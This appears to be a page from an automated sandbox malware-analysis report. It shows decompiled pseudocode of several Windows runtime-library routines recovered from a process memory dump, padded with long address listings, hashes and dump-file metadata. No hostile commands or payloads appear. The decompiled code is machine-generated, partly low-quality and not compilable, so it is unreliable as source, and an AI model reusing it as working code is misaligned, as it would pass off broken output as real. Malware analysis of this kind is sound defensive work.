                                                        0x04845b2b
                                                        0x04845b2e
                                                        0x04845b2e
                                                        0x048028a7
                                                        0x048028a9
                                                        0x04845b04
                                                        0x04845b09
                                                        0x04845b09
                                                        0x04845b09
                                                        0x00000000
                                                        0x00000000
                                                        0x04845b35
                                                        0x04845b3c
                                                        0x048028fb
                                                        0x048028fb
                                                        0x048026cc
                                                        0x048026cc
                                                        0x048026d0
                                                        0x00000000
                                                        0x048026d2
                                                        0x048026d2
                                                        0x00000000
                                                        0x048026d2
                                                        0x00000000
                                                        0x00000000
                                                        0x048025fe
                                                        0x0480292d
                                                        0x0480292f
                                                        0x04802930
                                                        0x04802935
                                                        0x04802937
                                                        0x0480293b
                                                        0x0480293f
                                                        0x04802943
                                                        0x04802947
                                                        0x0480294f
                                                        0x04802952
                                                        0x04802958
                                                        0x0480295a
                                                        0x04802960
                                                        0x04802962
                                                        0x04802963
                                                        0x04802967
                                                        0x0480296b
                                                        0x04802973
                                                        0x04802976
                                                        0x0480297e
                                                        0x0480297f
                                                        0x04802980
                                                        0x04802981
                                                        0x04802982
                                                        0x04802983
                                                        0x04802984
                                                        0x04802985
                                                        0x04802986
                                                        0x04802987
                                                        0x04802988
                                                        0x04802989
                                                        0x0480298a
                                                        0x0480298b
                                                        0x0480298c
                                                        0x0480298d
                                                        0x0480298e
                                                        0x0480298f
                                                        0x04802990
                                                        0x04802992
                                                        0x04802997
                                                        0x048029a3
                                                        0x048029a6
                                                        0x048029ab
                                                        0x048029ad
                                                        0x048029b0
                                                        0x048029b2
                                                        0x04845c80
                                                        0x048029b8
                                                        0x048029b8
                                                        0x048029bb
                                                        0x048029c0
                                                        0x048029c5
                                                        0x048029c6
                                                        0x048029c6
                                                        0x048029c9
                                                        0x048029cb
                                                        0x00000000
                                                        0x00000000
                                                        0x048029cd
                                                        0x048029d0
                                                        0x048029d9
                                                        0x048029db
                                                        0x048029dd
                                                        0x04802a7f
                                                        0x04802a84
                                                        0x04802a87
                                                        0x04802a89
                                                        0x04845ca1
                                                        0x04845ca3
                                                        0x00000000
                                                        0x04802a8f
                                                        0x04802a8f
                                                        0x00000000
                                                        0x04802a8f
                                                        0x00000000
                                                        0x048029e3
                                                        0x048029e3
                                                        0x048029e3
                                                        0x00000000
                                                        0x048029e3
                                                        0x048029dd
                                                        0x00000000
                                                        0x048029db
                                                        0x048029e6
                                                        0x048029e9
                                                        0x048029eb
                                                        0x048029ed
                                                        0x048029f3
                                                        0x048029f5
                                                        0x048029f8
                                                        0x048029fa
                                                        0x04802a97
                                                        0x04802a9a
                                                        0x04802a9d
                                                        0x04802add
                                                        0x00000000
                                                        0x04802a9f
                                                        0x04802aa2
                                                        0x04802aa5
                                                        0x04802aa8
                                                        0x04802aab
                                                        0x04845cab
                                                        0x04845caf
                                                        0x04845cc5
                                                        0x04845cda
                                                        0x04845cdc
                                                        0x04845cdf
                                                        0x04845ce5
                                                        0x00000000
                                                        0x04845ceb
                                                        0x04845ced
                                                        0x04845cee
                                                        0x00000000
                                                        0x04845cee
                                                        0x04845cb1
                                                        0x04845cb4
                                                        0x04845cb9
                                                        0x04845cbb
                                                        0x00000000
                                                        0x04845cbd
                                                        0x04845cbd
                                                        0x00000000
                                                        0x04845cbd
                                                        0x04845cbb
                                                        0x04802ab1
                                                        0x04802ab1
                                                        0x04802ac4
                                                        0x04802ac6
                                                        0x04802ac6
                                                        0x00000000
                                                        0x04802ac6
                                                        0x04802aab
                                                        0x00000000
                                                        0x04802a00
                                                        0x04802a09
                                                        0x04802a0e
                                                        0x04802a21
                                                        0x04802a24
                                                        0x04802a35
                                                        0x04802a3a
                                                        0x04802a3d
                                                        0x04802a42
                                                        0x04802a59
                                                        0x04802a59
                                                        0x04802a5c
                                                        0x04802a5f
                                                        0x04802a5f
                                                        0x048029fa
                                                        0x048029f3
                                                        0x04802a64
                                                        0x04802a64
                                                        0x04802a6b
                                                        0x04802a6b
                                                        0x04802a6d
                                                        0x04802a72
                                                        0x04802a72
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PATH
                                                        • API String ID: 0-1036084923
                                                        • Opcode ID: 2a93424acad23db3bacd818804e016cf25840e6e39318024ca1e1dc37b2cf56c
                                                        • Instruction ID: c23bb3aa9e5047c68cf847e7ba40c80cc2b28bfbc27faf82488a48634a84a200
                                                        • Opcode Fuzzy Hash: 2a93424acad23db3bacd818804e016cf25840e6e39318024ca1e1dc37b2cf56c
                                                        • Instruction Fuzzy Hash: 3AC1AD71E10219EBDB65DF98DC84AADB7B4FF48704F148A69E501EB290E7B4BC41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 63%
                                                        			E047D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x48c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x48c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E048197C0();
				}
				if( *0x48c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x48c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04801624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E047F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0486FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04819520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0480E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0482DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x48c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x48c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04819980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E048195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E047F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E047F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04857016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0486FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x48c5350;
							if(_t109 != 0x48c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0486FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04865720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                        0x047d2d8a
                                                        0x047d2d8a
                                                        0x047d2d92
                                                        0x047d2d96
                                                        0x047d2d9e
                                                        0x047d2da0
                                                        0x047d2da3
                                                        0x047d2da5
                                                        0x047d2da8
                                                        0x047d2dab
                                                        0x047d2db2
                                                        0x0482f9aa
                                                        0x0482f9ab
                                                        0x0482f9ae
                                                        0x0482f9ae
                                                        0x047d2db8
                                                        0x047d2dc2
                                                        0x0482f9b9
                                                        0x0482f9be
                                                        0x0482f9bf
                                                        0x0482f9bf
                                                        0x047d2dcf
                                                        0x0482f9c9
                                                        0x047d2dd5
                                                        0x047d2dd5
                                                        0x047d2dd5
                                                        0x047d2dde
                                                        0x047d2de1
                                                        0x047d2e70
                                                        0x047d2e72
                                                        0x047d2e72
                                                        0x047d2de7
                                                        0x047d2deb
                                                        0x047d2e7c
                                                        0x047d2e83
                                                        0x047d2e85
                                                        0x047d2e8b
                                                        0x047d2e8d
                                                        0x047d2e92
                                                        0x047d2e92
                                                        0x047d2e85
                                                        0x047d2df1
                                                        0x047d2df7
                                                        0x047d2df9
                                                        0x047d2df9
                                                        0x047d2dfc
                                                        0x047d2dff
                                                        0x047d2e02
                                                        0x00000000
                                                        0x047d2e05
                                                        0x047d2e0c
                                                        0x0482f9d9
                                                        0x047d2e12
                                                        0x047d2e12
                                                        0x047d2e12
                                                        0x047d2e1a
                                                        0x0482f9e3
                                                        0x0482f9e9
                                                        0x0482f9f0
                                                        0x0482f9f6
                                                        0x0482f9f8
                                                        0x0482f9f8
                                                        0x0482f9f0
                                                        0x047d2e23
                                                        0x0482fa02
                                                        0x0482fa03
                                                        0x0482fa05
                                                        0x0482fa06
                                                        0x00000000
                                                        0x047d2e29
                                                        0x047d2e29
                                                        0x047d2e2e
                                                        0x047d2e34
                                                        0x047d2e3e
                                                        0x00000000
                                                        0x00000000
                                                        0x047d2e44
                                                        0x047d2e47
                                                        0x047d2e4d
                                                        0x00000000
                                                        0x00000000
                                                        0x047d2e4f
                                                        0x047d2e54
                                                        0x00000000
                                                        0x00000000
                                                        0x047d2e5a
                                                        0x047d2e5f
                                                        0x047d2e9a
                                                        0x047d2ea4
                                                        0x047d2ea5
                                                        0x047d2ea8
                                                        0x047d2eaf
                                                        0x047d2eb2
                                                        0x047d2eb5
                                                        0x0482fae9
                                                        0x0482faeb
                                                        0x0482faed
                                                        0x0482faef
                                                        0x0482faf7
                                                        0x0482faf8
                                                        0x0482fafd
                                                        0x0482faff
                                                        0x0482fb04
                                                        0x0482fb04
                                                        0x0482faff
                                                        0x047d2ec0
                                                        0x047d2ec4
                                                        0x047d2ec6
                                                        0x047d2ec8
                                                        0x0482fb14
                                                        0x0482fb18
                                                        0x0482fb1e
                                                        0x0482fb21
                                                        0x0482fb21
                                                        0x047d2ece
                                                        0x047d2ece
                                                        0x047d2ece
                                                        0x047d2ed7
                                                        0x047d2e61
                                                        0x047d2e63
                                                        0x0482fa6b
                                                        0x0482fa71
                                                        0x0482fa76
                                                        0x0482fa78
                                                        0x0482fa8a
                                                        0x0482fa7a
                                                        0x0482fa83
                                                        0x0482fa83
                                                        0x0482fa8f
                                                        0x0482fa91
                                                        0x0482fa97
                                                        0x0482fa9d
                                                        0x0482faa4
                                                        0x0482faaa
                                                        0x0482faaf
                                                        0x0482fab1
                                                        0x0482fac3
                                                        0x0482fab3
                                                        0x0482fabc
                                                        0x0482fabc
                                                        0x0482fac8
                                                        0x0482facb
                                                        0x0482fadf
                                                        0x0482fadf
                                                        0x0482facb
                                                        0x0482faa4
                                                        0x0482fa91
                                                        0x047d2e6f
                                                        0x047d2e6f
                                                        0x047d2e5f
                                                        0x0482fa13
                                                        0x0482fa15
                                                        0x0482fa17
                                                        0x0482fa1f
                                                        0x0482fa21
                                                        0x0482fa22
                                                        0x0482fa25
                                                        0x0482fa28
                                                        0x0482fa2f
                                                        0x0482fa2f
                                                        0x0482fa2a
                                                        0x0482fa2a
                                                        0x0482fa2a
                                                        0x0482fa31
                                                        0x0482fa34
                                                        0x0482fa36
                                                        0x0482fa3c
                                                        0x0482fa3e
                                                        0x0482fa41
                                                        0x0482fa43
                                                        0x0482fa45
                                                        0x0482fa45
                                                        0x0482fa41
                                                        0x0482fa3c
                                                        0x0482fa4a
                                                        0x0482fa4f
                                                        0x0482fa51
                                                        0x0482fa53
                                                        0x0482fa56
                                                        0x0482fa5b
                                                        0x0482fa5e
                                                        0x00000000
                                                        0x0482fa5e
                                                        0x047d2e23

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Re-Waiting
                                                        • API String ID: 0-316354757
                                                        • Opcode ID: 1503a44439e2a5cd62badf35f5c5aff72022d571e835db0e207b7f9436c781ef
                                                        • Instruction ID: ad901ac595c4e372ee2746b92b218d8cc9993cbfc0d844fc4773963ce40e1239
                                                        • Opcode Fuzzy Hash: 1503a44439e2a5cd62badf35f5c5aff72022d571e835db0e207b7f9436c781ef
                                                        • Instruction Fuzzy Hash: 9C614530A00214AFEB22DF68C944B7E77B0EB44318F140BA9EA12D73C1D774B982E781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04802AE4, Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E04802AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x48c8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x48c8208; // 0x48c8207
				_t8 = _t57 + 0x48c8208; // 0x48c8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x48c8450; // 0x66365a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x48c821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x48c6d5c; // 0x7fdf0654
							_t72 =  *0x48c6d5c; // 0x7fdf0654
							_t75 =  *0x48c6d5c; // 0x7fdf0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x48c6d5c; // 0x7fdf0654
							_t84 =  *0x48c6d5c; // 0x7fdf0654
							_t87 =  *0x48c6d5c; // 0x7fdf0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0481F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                        0x04802ae4
                                                        0x04802aec
                                                        0x04802aef
                                                        0x04802af4
                                                        0x04802af7
                                                        0x04802afd
                                                        0x04802b92
                                                        0x04802b92
                                                        0x04802b97
                                                        0x04802b9c
                                                        0x04802b9c
                                                        0x04802b03
                                                        0x04802b06
                                                        0x04802b09
                                                        0x04802b09
                                                        0x04802b0f
                                                        0x04802b15
                                                        0x04802b15
                                                        0x04802b1b
                                                        0x04802b1e
                                                        0x04802b21
                                                        0x04802b26
                                                        0x04802b29
                                                        0x04802b81
                                                        0x04802b84
                                                        0x04802c0e
                                                        0x04802c15
                                                        0x04802c24
                                                        0x04802c24
                                                        0x04802b8a
                                                        0x04802b8a
                                                        0x04802b8a
                                                        0x04802b8a
                                                        0x04802b90
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04802b4a
                                                        0x04802b4a
                                                        0x04802b4d
                                                        0x04802b53
                                                        0x00000000
                                                        0x00000000
                                                        0x04802b55
                                                        0x04802b58
                                                        0x04802bb7
                                                        0x04845d1b
                                                        0x04845d37
                                                        0x04845d47
                                                        0x04845d53
                                                        0x04802bbd
                                                        0x04802bbd
                                                        0x04802bbd
                                                        0x04802bb7
                                                        0x04802b5d
                                                        0x04802c2f
                                                        0x04845d5b
                                                        0x04845d77
                                                        0x04845d87
                                                        0x04845d93
                                                        0x04802c35
                                                        0x04802c35
                                                        0x04802c35
                                                        0x04802c2f
                                                        0x04802b65
                                                        0x04802b9f
                                                        0x04802ba2
                                                        0x04802b67
                                                        0x04802b67
                                                        0x04802b69
                                                        0x04802b6b
                                                        0x04802b6e
                                                        0x04802bc9
                                                        0x04802bcc
                                                        0x04802bcf
                                                        0x04802bd4
                                                        0x04802bd6
                                                        0x04802bd6
                                                        0x04802bdb
                                                        0x04802c02
                                                        0x04802c05
                                                        0x04802c07
                                                        0x00000000
                                                        0x04802c07
                                                        0x04802be0
                                                        0x04802c00
                                                        0x04802c3f
                                                        0x04802c3f
                                                        0x00000000
                                                        0x04802c00
                                                        0x04802be5
                                                        0x04802be7
                                                        0x04802bec
                                                        0x04802bf4
                                                        0x04802bf6
                                                        0x00000000
                                                        0x04802bf6
                                                        0x04802b70
                                                        0x04802b76
                                                        0x04802b2b
                                                        0x04802b2b
                                                        0x04802b2d
                                                        0x04802b2f
                                                        0x04802b32
                                                        0x04802b35
                                                        0x04802b3a
                                                        0x00000000
                                                        0x04802b40
                                                        0x04802b43
                                                        0x04802b45
                                                        0x04802b47
                                                        0x04802b4a
                                                        0x04802b4d
                                                        0x04802b53
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04802b53
                                                        0x04802b78
                                                        0x04802b78
                                                        0x04802b7b
                                                        0x04802b7e
                                                        0x00000000
                                                        0x04802b7e
                                                        0x04802b76
                                                        0x04802ba5
                                                        0x04802ba5
                                                        0x04802ba8
                                                        0x04802bad
                                                        0x00000000
                                                        0x00000000
                                                        0x04802baf
                                                        0x04802baf
                                                        0x04802bc2
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Z6f
                                                        • API String ID: 0-3014076268
                                                        • Opcode ID: 1beef6cc9b7ea47e4dd12d7b330d5ef66515bca49f4c2760e0812131ded516e4
                                                        • Instruction ID: ed035d44a6922395e4f1d2b5df88df840aef4999ab0277d73b600180b287bc78
                                                        • Opcode Fuzzy Hash: 1beef6cc9b7ea47e4dd12d7b330d5ef66515bca49f4c2760e0812131ded516e4
                                                        • Instruction Fuzzy Hash: B451A076B10129CB8B54DF18C8989ADB7B1FB88700715CE9AE846EB390E774BE419790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E048A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0489FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E048A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04819730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0489A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0489A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x48c8b04 >> 0x14) + (_v44 -  *0x48c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E047F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0489138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E047F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0488FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x48c8724 & 0x00000008) != 0) {
						E048952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E048A15B5(0x48c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                        0x048a0eb7
                                                        0x048a0eb9
                                                        0x048a0ec0
                                                        0x048a0ec2
                                                        0x048a0ecd
                                                        0x048a105b
                                                        0x048a105b
                                                        0x048a1061
                                                        0x048a1066
                                                        0x048a1066
                                                        0x048a106b
                                                        0x048a1073
                                                        0x048a1073
                                                        0x048a0ed3
                                                        0x048a0ed6
                                                        0x048a0edc
                                                        0x048a0ee0
                                                        0x048a0ee7
                                                        0x048a0ef0
                                                        0x048a0ef5
                                                        0x048a0efa
                                                        0x048a0efc
                                                        0x048a0efd
                                                        0x048a0f03
                                                        0x048a0f04
                                                        0x048a0f06
                                                        0x048a0f07
                                                        0x048a0f09
                                                        0x048a0f0e
                                                        0x048a0f14
                                                        0x048a0f23
                                                        0x048a0f2d
                                                        0x048a0f34
                                                        0x048a0f34
                                                        0x048a0f14
                                                        0x048a0f52
                                                        0x00000000
                                                        0x00000000
                                                        0x048a0f58
                                                        0x048a0f73
                                                        0x048a0f74
                                                        0x048a0f79
                                                        0x048a0f7d
                                                        0x048a0f80
                                                        0x048a0f86
                                                        0x048a0fab
                                                        0x048a0fb5
                                                        0x048a0fc6
                                                        0x048a0fd1
                                                        0x048a0fe3
                                                        0x048a0fd3
                                                        0x048a0fdc
                                                        0x048a0fdc
                                                        0x048a0feb
                                                        0x048a1009
                                                        0x048a1009
                                                        0x048a1015
                                                        0x048a1027
                                                        0x048a1017
                                                        0x048a1020
                                                        0x048a1020
                                                        0x048a102f
                                                        0x048a103c
                                                        0x048a103c
                                                        0x048a1048
                                                        0x048a1050
                                                        0x048a1050
                                                        0x048a1055
                                                        0x00000000
                                                        0x048a1055
                                                        0x048a0f88
                                                        0x048a0f9e
